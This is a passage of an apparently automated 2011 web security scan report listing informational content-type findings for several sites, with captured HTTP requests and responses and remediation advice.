Request

GET /js/flash-detect.js HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1303137471.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:37 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 6402
Content-Type: text/html


if(typeof deconcept=="undefined")var deconcept=new Object();if(typeof deconcept.util=="undefined")deconcept.util=new Object();if(typeof deconcept.SWFObjectUtil=="undefined")deconcept.SWFObjectUtil=ne
...[SNIP]...
33.86. http://www.socialfollow.com/js/jquery.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.socialfollow.com
Path:   /js/jquery.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/jquery.js HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1303137471.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:37 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Type: text/html
Content-Length: 56805


(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||
...[SNIP]...
33.87. http://www.socialfollow.com/js/thickbox.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.socialfollow.com
Path:   /js/thickbox.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/thickbox.js HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1303137471.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:38 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Type: text/html
Content-Length: 8343


var tb_pathToImage="images/loadingAnimation.gif";$(document).ready(function(){tb_init('a.thickbox, area.thickbox, input.thickbox');imgLoader=new Image();imgLoader.src=tb_pathToImage;});function tb_in
...[SNIP]...
33.88. http://www.socialfollow.com/js/validator.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.socialfollow.com
Path:   /js/validator.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/validator.js HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1303137471.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:37 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Type: text/html
Content-Length: 9358


function in_array(needle,haystack,argStrict){var found=false,key,strict=!!argStrict;for(key in haystack){if((strict&&haystack[key]===needle)||(!strict&&haystack[key]==needle)){found=true;break;}}
ret
...[SNIP]...
33.89. https://www.trust-guard.com/Images/BuyPage/scan-buttons/ScanBtns-gray_01.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.trust-guard.com
Path:   /Images/BuyPage/scan-buttons/ScanBtns-gray_01.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /Images/BuyPage/scan-buttons/ScanBtns-gray_01.jpg HTTP/1.1
Host: www.trust-guard.com
Connection: keep-alive
Referer: https://www.trust-guard.com/compare-Trust-Seals-s/1.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; PHPSESSID=9t7seirvsb0c34pngfqn7mcun3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:49:40 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 12 Jan 2011 23:46:50 GMT
ETag: "80f001b-200-499aed09aae80"
Accept-Ranges: bytes
Content-Length: 512
Cache-Control: max-age=5184000, public
Connection: close
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

.............................................................*.)..
...[SNIP]...
33.90. https://www.trust-guard.com/Images/BuyPage/scan-buttons/ScanBtns-gray_05.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.trust-guard.com
Path:   /Images/BuyPage/scan-buttons/ScanBtns-gray_05.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /Images/BuyPage/scan-buttons/ScanBtns-gray_05.jpg HTTP/1.1
Host: www.trust-guard.com
Connection: keep-alive
Referer: https://www.trust-guard.com/compare-Trust-Seals-s/1.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; PHPSESSID=9t7seirvsb0c34pngfqn7mcun3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:49:41 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 12 Jan 2011 23:46:50 GMT
ETag: "80f0015-c00-499aed09aae80"
Accept-Ranges: bytes
Content-Length: 3072
Cache-Control: max-age=5184000, public
Connection: close
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

.............................................................*....
...[SNIP]...
33.91. https://www.trust-guard.com/Images/BuyPage/scan-buttons/ScanBtns-gray_07.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.trust-guard.com
Path:   /Images/BuyPage/scan-buttons/ScanBtns-gray_07.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /Images/BuyPage/scan-buttons/ScanBtns-gray_07.jpg HTTP/1.1
Host: www.trust-guard.com
Connection: keep-alive
Referer: https://www.trust-guard.com/compare-Trust-Seals-s/1.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; PHPSESSID=9t7seirvsb0c34pngfqn7mcun3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:49:41 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 12 Jan 2011 23:46:50 GMT
ETag: "80f000b-200-499aed09aae80"
Accept-Ranges: bytes
Content-Length: 512
Cache-Control: max-age=5184000, public
Connection: close
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

.............................................................*....
...[SNIP]...
33.92. https://www.trust-guard.com/Images/BuyPage/scan-buttons/ScanBtns-white_05.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.trust-guard.com
Path:   /Images/BuyPage/scan-buttons/ScanBtns-white_05.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /Images/BuyPage/scan-buttons/ScanBtns-white_05.jpg HTTP/1.1
Host: www.trust-guard.com
Connection: keep-alive
Referer: https://www.trust-guard.com/compare-Trust-Seals-s/1.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=9t7seirvsb0c34pngfqn7mcun3; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:49:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 12 Jan 2011 23:46:50 GMT
ETag: "80f0012-c00-499aed09aae80"
Accept-Ranges: bytes
Content-Length: 3072
Cache-Control: max-age=5184000, public
Connection: close
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

.............................................................*....
...[SNIP]...
33.93. https://www.trust-guard.com/Templates/New-Green/Images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.trust-guard.com
Path:   /Templates/New-Green/Images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /Templates/New-Green/Images/favicon.ico HTTP/1.1
Host: www.trust-guard.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=9t7seirvsb0c34pngfqn7mcun3; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:49:46 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 29 Jan 2011 00:31:45 GMT
ETag: "42686d9-47e-49af14eb31e40"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....................................................III.AAA.................................................www.#"#.Ks:.Hn6.....UUU...............................
...[SNIP]...
33.94. http://www2.sesamestats.com/paneltracking.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www2.sesamestats.com
Path:   /paneltracking.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a BMP image.

Request

GET /paneltracking.aspx?bannerid=ExpediaMarriottControl&BannerPos=dnt&BannerSite=www.anysite.com&CampaignId=ExpediaMarriott&mediaType=Banner&mediaSource=Internet&rnd=cyazId,bgNiKzIgalgNs HTTP/1.1
Host: www2.sesamestats.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "22ba9d43aa1d26928512e501f6a029a5:1267715541"
Last-Modified: Thu, 04 Mar 2010 15:12:21 GMT
Accept-Ranges: bytes
Content-Length: 58
Content-Type: image/gif
Date: Fri, 06 May 2011 22:33:34 GMT
Connection: close
X-N: S

BM:.......6...(...........................................
34. Content type is not specified  previous
There are 11 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

34.1. http://www.expedia.com/static/default/default/images/close.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/close.gif

Request

GET /static/default/default/images/close.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/Hotels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s1=`0; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3DundefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"922-1303251668860"
Last-Modified: Tue, 19 Apr 2011 22:21:08 GMT
Content-Length: 922
Date: Fri, 06 May 2011 22:42:18 GMT
Connection: close

GIF89a.... ..!.......,..............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f..............3..f.........3..3.33.f3..3..3..3+.3+33+f3+.3+.3+.3U.3U33
...[SNIP]...
34.2. http://www.expedia.com/static/frog/v0.1a/images/iconSpritesT.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/frog/v0.1a/images/iconSpritesT.png

Request

GET /static/frog/v0.1a/images/iconSpritesT.png HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/hotels/unpublishedrates/default.asp?mcicid=101278404
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"5144-1303251708863"
Last-Modified: Tue, 19 Apr 2011 22:21:48 GMT
Content-Length: 5144
Date: Fri, 06 May 2011 22:34:24 GMT
Connection: close

.PNG
.
...IHDR...,...D........p....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....PLTEx..........ce..W..4y....P.]..4..M........<................................u..T..L.....m.......O...C{.l..~
...[SNIP]...
34.3. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/buttonBG.png

Request

GET /static/fusion/v2.3/images/buttonBG.png HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/Hotels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s1=`0; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3DundefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1636-1303251687426"
Last-Modified: Tue, 19 Apr 2011 22:21:27 GMT
Content-Length: 1636
Date: Fri, 06 May 2011 22:42:18 GMT
Connection: close

.PNG
.
...IHDR...,...S.............tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
34.4. http://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

Request

GET /static/fusion/v2.3/images/container/module-borders-sprite-alpha.png HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/Hotels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253D50053%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/Hotels%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s1=`0; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"3834-1303251655888"
Last-Modified: Tue, 19 Apr 2011 22:20:55 GMT
Content-Length: 3834
Date: Fri, 06 May 2011 22:42:17 GMT
Connection: close

.PNG
.
...IHDR..............q.~....gAMA......a.....PLTE...333.5]......................................................................................................................................
...[SNIP]...
34.5. http://www.expedia.com/static/fusion/v2.3/images/customersupport/flyout_arrow.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/customersupport/flyout_arrow.png

Request

GET /static/fusion/v2.3/images/customersupport/flyout_arrow.png HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/Hotels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s1=`0; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3DundefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
